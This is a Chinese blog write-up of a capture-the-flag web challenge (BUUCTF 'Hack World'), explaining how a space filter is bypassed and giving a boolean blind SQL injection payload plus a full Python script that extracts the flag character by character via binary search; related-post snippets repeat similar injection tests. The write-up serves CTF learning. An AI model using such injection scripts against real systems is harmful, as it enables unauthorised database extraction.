BUUCTF-[CISCN2019 华北赛区 Day2 Web1]Hack World

最新推荐文章于 2024-02-28 21:29:25 发布
最新推荐文章于 2024-02-28 21:29:25 发布
阅读量262 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xixihahawuwu/article/details/113055190
版权

在这里插入图片描述
进入题目后。看到了一句话,just give the id。猜测应该是数字型注入

先随机输入
查询1时
在这里插入图片描述
查询id为2时
在这里插入图片描述
当查询数字超过3后报错
在这里插入图片描述
当我尝试着进行注入时
查询一下回显点时
1 union select 1,2
在这里插入图片描述
题目对SQL语句做了一些限制
做一个模糊测试
在这里插入图片描述
在这里插入图片描述还好并没有过滤一些函数
ascii没有被过滤,substr也没被过滤,空格被过滤了,可以使用()来绕过
这里运用sql的三目运算
if( 表达式1,表达式2,表达式3)
如果表达式1是正确的,那么执行表达式2,否则执行表达式3
if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,2)" % (x, mid)
直接选择脚本运行(手工能累死人的)

import requests

url = 'http://58104758-654b-42a5-b64b-265a062cd8d8.node3.buuoj.cn/index.php'
result = ''

for x in range(1, 50):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        payload = "if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,2)" % (x, mid)
        data = {
            "id":payload
        }
        response = requests.post(url, data = data)
        if 'Hello' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2

    result += chr(int(mid))
    print(result)

在这里插入图片描述

一名无聊的网友
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
国赛华北赛区Day1Web2源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。 3、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。 国赛华北赛区Day1Web2源码+学习说明.zip
[CISCN2019 华北赛区 Day2 Web1]Hack World
qq_46266956的博客
04-24 559
[CISCN2019 华北赛区 Day2 Web1]Hack World 注入题: 直接抓包burpsuite fuzz测试 过滤了一些关键字,但能够看出来存在bool漏洞 发现当true时,Hello,glzjin wants a girlfriend. fslse时,Error Occured When Fetch Result. 据此,写脚本 import requests import string import time timeout=None def bool_blind(url):
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
最新发布
2302_79800344的博客
02-28 925
【代码】[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解。
web buuctf [CISCN2019 华北赛区 Day2 Web1]Hack World1
weixin_44214568的博客
03-20 1648
考点:盲注(布尔注入);异或的使用 1.输入1' 提示的是bool(错误),这里没有报错回显,只提示错误,其实就可以判断出是个布尔注入 2. 输入1' or '1=1'# 存在过滤,用bp抓包,fuzz进行爆破,看过滤了什么字符; (看回显,长度为482的都会提示sql注入,即被过滤的字符)这只能确定一部分,在实际操作中因为字符链接,字符本身都会产生新的过滤,注意一下 or的连接语句,空格等 3.根据提示 即从表flag的flag列内提取内容,根据前面的操作可知存在布尔注入,我
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_74911687的博客
03-03 552
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
国赛华北赛区Day1Web1源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web1源码+学习说明.zip
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
华北电力大学高等数学期末考试题2018-2019第2学期(A).pdf
06-06
华北电力大学高等数学期末考试题2018-2019第2学期(A),适合考研复试以及平常期末考试复习使用
2018--2019 学年度第二学期期末考试试卷(A)答案.pdf
06-06
华北电力大学高等数学期末考试题2018-2019第2学期(A)参考答案,适合考研复试以及平常期末考试复习使用
【CTF-webbuuctf-[CISCN2019 华北赛区 Day2 Web1]Hack World(sql盲注)
Sankkl1的博客
08-18 386
根据上图可知,页面中已经告诉我们要从flag表中的flag列取出flag,思考是sql注入。经过抓包发现发post包中的id字段是注入点。同时还发现是盲注,即当存在SQL注入时,攻击者无法通过页面或请求的返回信息,回显或获取到SQL注入语句的执行结果。由此可以通过if函数来测试flag每一位的值,以下为编写的测试脚本。经测试当输入id=1时,结果为。,发现过滤了空格、#等符号。,当id=2时,结果为。
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World
qq_60829702的博客
10-22 576
使用二分法就是快呀,大家可以运行这两个脚本比较一下,我刚开始是用第二个的,后面用了第一个。这两个就不是一个级别的,这里我编写二分法脚本的时候也出现了一点问题,然后看其他师傅的文章借鉴了一下。看到这里确实是可以的,但是当我们输入id=0的时候也会显示这个错误,所以我们就不需要使用异或了,直接就是布尔盲注就行了。按照正常的思路,就是找到注入点后就看能不能使其闭合了,但没办法过滤了太多了,我们使用bp看一下过滤了哪些东西。我这里有两个脚本一个二分法的,一个就是直接暴力比较的脚本,有需要可以自取。
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一名无聊的网友

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值